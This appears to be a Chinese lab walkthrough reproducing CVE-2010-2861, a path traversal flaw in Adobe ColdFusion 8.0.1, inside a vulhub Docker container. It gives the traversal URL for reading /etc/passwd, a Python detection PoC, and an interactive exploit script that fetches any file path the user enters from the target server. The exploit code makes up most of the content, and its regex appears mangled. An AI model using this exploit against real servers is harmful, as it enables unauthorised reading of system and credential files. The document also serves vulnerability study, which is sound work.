使用vulhub,进入对应文件夹启动Adobe CanFusion 8.0.1版本服务器:
[root@localhost ~]# cd /home/vulhub-master/coldfusion/CVE-2010-2861/ [root@localhost CVE-2010-2861]# docker-compose up -d
查看端口:
[root@localhost ~]# docker ps ConTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 781868f36616 vulhub/coldfusion:8.0.1 "bash -c '/opt/coldf…" 24 hours ago Up 24 hours 0.0.0.0:8500->8500/tcp, :::8500->8500/tcp cve-2010-2861_coldfusion_1
环境启动可能需要1~5分钟,启动后,访问http://your-ip:8500/CFIDE/administrator/enter.cfm,可以查看初始化页面,输入密码admin,开始初始化整个环境。
漏洞复现:
直接访问http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en,Burp Suite查看文件,读取文件/etc/passwd:
import requests url = "http://192.168.33.170:8500/" #url地址 poc = "CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en" #读取/etc/passwd res = requests.get(url+poc) #发送请求 if "/bin/bash" in res.text and res.status_code == 200: #利用 "/bin/bash" 特征和响应 200 判断 print("CVE-2010-2861 存在")
pycharm运行结果:
EXP编写:import requests,re url = "http://192.168.33.170:8500/" #url地址 poc = "CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en" #读取/etc/passwd res = requests.get(url+poc) #发送请求 if "/bin/bash" in res.text and res.status_code == 200: #利用 "/bin/bash" 特征和响应 200 判断 print("CVE-2010-2861 存在") while 1: # EXP死循环 dir = input("请输入你要读取的文件:") exp_res = requests.get(res.url.replace("/etc/passwd",dir)) #将要读取的/etc/passwd目录文件替换成输入的目录文件 print(re.findall("([sS]*?) ",exp_res.text)) #利用正则输出匹配的结果
pycharm运行结果: